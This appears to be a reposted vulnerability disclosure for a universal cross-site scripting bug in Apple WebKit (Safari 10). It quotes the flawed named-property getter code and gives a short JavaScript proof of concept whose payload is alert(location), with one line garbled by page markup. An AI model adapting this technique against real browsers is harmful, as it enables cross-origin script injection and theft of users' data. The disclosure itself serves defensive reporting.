Apple Webkit Named Property UXSS

Apple Webkit suffered from a cross site scripting vulnerability when accessing a named property from an unloaded window.

MD5 | e7247888d10503970219f34be3edfb65

 Apple Webkit: UXSS by accessing a named property from an unloaded window 


The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function.

static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)
Document* document = frame.document(); <<-------- the new document.
if (is<HTMLDocument>(*document)) {
auto& htmlDocument = downcast<HTMLDocument>(*document);
auto* atomicPropertyName = propertyName.publicName();
if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {
JSValue namedItem;
if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {
Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);
ASSERT(collection->length() > 1);
namedItem = toJS(exec, thisObject->globalObject(), collection);
} else
namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName));
slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);
return true;

return false;


"use strict";

let f = document.body.appendChild(document.createElement("iframe"));
let get_element = f.contentWindow.Function("return logo;");

f.onload = () => {
f.onload = null;

let node = get_element();

var sc = document.createElement("script");
sc.innerText = "alert(location)";

f.src = "<a href="";" title="" class="" rel="nofollow">";</a>

Tested on Safari 10.0.2(12602.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Found by: lokihardt

Related Posts